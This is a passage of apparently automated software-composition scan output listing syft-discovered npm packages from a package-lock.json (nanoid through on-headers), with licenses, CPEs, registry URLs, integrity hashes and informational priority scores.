pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 545c4a29aa435f71 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: nanoid 3.3.11' title: nanoid 3.3.11 description: 'Package discovered: nanoid 3.3.11' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: fc2d97a12d1a4dda name: nanoid version: 3.3.11 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:nanoid_project:nanoid:3.3.11:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/nanoid@3.3.11 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/nanoid/-/nanoid-3.3.11.tgz integrity: sha512-N8SpfPUnUp1bK+PMYW8qSWdl9U+wwNWI4QKxOYDy9JAro3WMX7p2OeVRF9v+347pnakNevPmiHhNmZ2HbFA76w== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 932afc2de4b38fa5 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: negotiator 0.6.3' title: negotiator 0.6.3 description: 'Package discovered: negotiator 0.6.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 312bd96694b2eb5b name: negotiator version: 0.6.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:negotiator:negotiator:0.6.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/negotiator@0.6.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/negotiator/-/negotiator-0.6.3.tgz integrity: sha512-+EUsqGPLsM+j/zdChZjsnX51g4XrHFOIXwfnCVPGlQk/k5giakcKsuxCObBRu6DSm9opw/O6slWbJdghQM4bBg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d346e21d42fdf73e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: next 14.2.3' title: next 14.2.3 description: 'Package discovered: next 14.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a9792237818f8415 name: next version: 14.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:vercel:next.js:14.2.3:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/next@14.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/next/-/next-14.2.3.tgz integrity: sha512-dowFkFTR8v79NPJO4QsBUtxv0g9BrS/phluVpMAt2ku7H+cbcBJlopXjkWlwxrk/xGqMemr7JkGPGemPrLLX7A== dependencies: '@next/env': 14.2.3 '@swc/helpers': 0.5.5 busboy: 1.6.0 caniuse-lite: ^1.0.30001579 graceful-fs: ^4.2.11 postcss: 8.4.31 styled-jsx: 5.1.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 35dad46b81d74be4 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: node-cron 3.0.3' title: node-cron 3.0.3 description: 'Package discovered: node-cron 3.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 5c4492e68f441264 name: node-cron version: 3.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:node-cron:node-cron:3.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:node-cron:node_cron:3.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:node_cron:node-cron:3.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:node_cron:node_cron:3.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:node:node-cron:3.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:node:node_cron:3.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/node-cron@3.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/node-cron/-/node-cron-3.0.3.tgz integrity: sha512-dOal67//nohNgYWb+nWmg5dkFdIwDm8EpeGYMekPMrngV3637lqnX0lbUcCtgibHTz6SEz7DAIjKvKDFYCnO1A== dependencies: uuid: 8.3.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 5d72f54e4946a64f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: node-fetch 2.7.0' title: node-fetch 2.7.0 description: 'Package discovered: node-fetch 2.7.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 71294da0e67ef2a3 name: node-fetch version: 2.7.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:node-fetch_project:node-fetch:2.7.0:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/node-fetch@2.7.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz integrity: sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A== dependencies: whatwg-url: ^5.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2cbaa504cc478c46 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: node-forge 1.4.0' title: node-forge 1.4.0 description: 'Package discovered: node-forge 1.4.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c1e5f20287afef44 name: node-forge version: 1.4.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: (BSD-3-Clause OR GPL-2.0) spdxExpression: (BSD-3-Clause OR GPL-2.0) type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:digitalbazaar:forge:1.4.0:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/node-forge@1.4.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/node-forge/-/node-forge-1.4.0.tgz integrity: sha512-LarFH0+6VfriEhqMMcLX2F7SwSXeWwnEAJEsYm5QKWchiVYVvJyV9v7UDvUv+w5HO23ZpQTXDv/GxdDdMyOuoQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c9ae4bba0c53507d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: node-releases 2.0.38' title: node-releases 2.0.38 description: 'Package discovered: node-releases 2.0.38' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 157e4f935702d7be name: node-releases version: 2.0.38 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:node-releases:node-releases:2.0.38:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:node-releases:node_releases:2.0.38:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:node_releases:node-releases:2.0.38:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:node_releases:node_releases:2.0.38:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:node:node-releases:2.0.38:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:node:node_releases:2.0.38:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/node-releases@2.0.38 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/node-releases/-/node-releases-2.0.38.tgz integrity: sha512-3qT/88Y3FbH/Kx4szpQQ4HzUbVrHPKTLVpVocKiLfoYvw9XSGOX2FmD2d6DrXbVYyAQTF2HeF6My8jmzx7/CRw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b468b7afcd57f5e8 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: nodemailer 6.10.1' title: nodemailer 6.10.1 description: 'Package discovered: nodemailer 6.10.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: bdc7a63994d0b28a name: nodemailer version: 6.10.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT-0 spdxExpression: MIT-0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:nodemailer:nodemailer:6.10.1:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/nodemailer@6.10.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/nodemailer/-/nodemailer-6.10.1.tgz integrity: sha512-Z+iLaBGVaSjbIzQ4pX6XV41HrooLsQ10ZWPUehGmuantvzWoDVBnmsdUcOIDM1t+yPor5pDhVlDESgOMEGxhHA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: eca5920a6d6c920a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: nopt 7.2.1' title: nopt 7.2.1 description: 'Package discovered: nopt 7.2.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 47f001cd3ecd3ee8 name: nopt version: 7.2.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:nopt:nopt:7.2.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/nopt@7.2.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/nopt/-/nopt-7.2.1.tgz integrity: sha512-taM24ViiimT/XntxbPyJQzCG+p4EKOpgD3mxFwW38mGjVUrfERQOeY4EDHjdnptttfHuHQXFx+lTP08Q+mLa/w== dependencies: abbrev: ^2.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b6fa9eec1e273eef ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: normalize-path 3.0.0' title: normalize-path 3.0.0 description: 'Package discovered: normalize-path 3.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 86c9c8fe4da1b72f name: normalize-path version: 3.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:normalize-path:normalize-path:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:normalize-path:normalize_path:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:normalize_path:normalize-path:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:normalize_path:normalize_path:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:normalize:normalize-path:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:normalize:normalize_path:3.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/normalize-path@3.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz integrity: sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0c9db30b81ebd770 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: normalize-svg-path 1.1.0' title: normalize-svg-path 1.1.0 description: 'Package discovered: normalize-svg-path 1.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2e420341fd4164af name: normalize-svg-path version: 1.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:normalize-svg-path:normalize-svg-path:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:normalize-svg-path:normalize_svg_path:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:normalize_svg_path:normalize-svg-path:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:normalize_svg_path:normalize_svg_path:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:normalize-svg:normalize-svg-path:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:normalize-svg:normalize_svg_path:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:normalize_svg:normalize-svg-path:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:normalize_svg:normalize_svg_path:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:normalize:normalize-svg-path:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:normalize:normalize_svg_path:1.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/normalize-svg-path@1.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/normalize-svg-path/-/normalize-svg-path-1.1.0.tgz integrity: sha512-r9KHKG2UUeB5LoTouwDzBy2VxXlHsiM6fyLQvnJa0S5hrhzqElH/CH7TUGhT1fVvIYBIKf3OpY4YJ4CK+iaqHg== dependencies: svg-arc-to-cubic-bezier: ^3.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: bb2a72a38fc8e367 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: object-assign 4.1.1' title: object-assign 4.1.1 description: 'Package discovered: object-assign 4.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d7b65c8670c0c943 name: object-assign version: 4.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:object-assign:object-assign:4.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:object-assign:object_assign:4.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:object_assign:object-assign:4.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:object_assign:object_assign:4.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:object:object-assign:4.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:object:object_assign:4.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/object-assign@4.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/object-assign/-/object-assign-4.1.1.tgz integrity: sha512-rJgTQnkUnH1sFw8yT6VSU3zD3sWmu6sZhIseY8VX+GRu3P6F7Fu+JNDoXfklElbLJSnc3FUQHVe4cU5hj+BcUg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7280439ae019eb34 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: object-hash 3.0.0' title: object-hash 3.0.0 description: 'Package discovered: object-hash 3.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f0415e28bd0fa73d name: object-hash version: 3.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:object-hash:object-hash:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:object-hash:object_hash:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:object_hash:object-hash:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:object_hash:object_hash:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:object:object-hash:3.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:object:object_hash:3.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/object-hash@3.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz integrity: sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 570f098417dfedef ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: object-inspect 1.13.4' title: object-inspect 1.13.4 description: 'Package discovered: object-inspect 1.13.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 67701f4036faa68d name: object-inspect version: 1.13.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:object-inspect:object-inspect:1.13.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:object-inspect:object_inspect:1.13.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:object_inspect:object-inspect:1.13.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:object_inspect:object_inspect:1.13.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:object:object-inspect:1.13.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:object:object_inspect:1.13.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/object-inspect@1.13.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/object-inspect/-/object-inspect-1.13.4.tgz integrity: sha512-W67iLl4J2EXEGTbfeHCffrjDfitvLANg0UlX3wFUUSTx92KXRFegMHUVgSqE+wvhAbi4WqjGg9czysTV2Epbew== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 276b1e3a3b3501f5 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: on-finished 2.3.0' title: on-finished 2.3.0 description: 'Package discovered: on-finished 2.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3329ff372baa3c68 name: on-finished version: 2.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:on-finished:on-finished:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:on-finished:on_finished:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:on_finished:on-finished:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:on_finished:on_finished:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:on:on-finished:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:on:on_finished:2.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/on-finished@2.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/on-finished/-/on-finished-2.3.0.tgz integrity: sha512-ikqdkGAAyf/X/gPhXGvfgAytDZtDbr+bkNUJ0N9h5MI/dmdgCs3l6hoHrcUv41sRKew3jIwrp4qQDXiK99Utww== dependencies: ee-first: 1.1.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1ede69e18336ab8f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: on-finished 2.4.1' title: on-finished 2.4.1 description: 'Package discovered: on-finished 2.4.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9c42ff2fa50e9c68 name: on-finished version: 2.4.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:on-finished:on-finished:2.4.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:on-finished:on_finished:2.4.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:on_finished:on-finished:2.4.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:on_finished:on_finished:2.4.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:on:on-finished:2.4.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:on:on_finished:2.4.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/on-finished@2.4.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz integrity: sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg== dependencies: ee-first: 1.1.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 01ce9d2b89e4c438 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: on-headers 1.1.0' title: on-headers 1.1.0 description: 'Package discovered: on-headers 1.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c535b114447926f1 name: on-headers version: 1.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:on-headers:on-headers:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:on-headers:on_headers:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:on_headers:on-headers:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:on_headers:on_headers:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:on:on-headers:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:on:on_headers:1.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/on-headers@1.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: 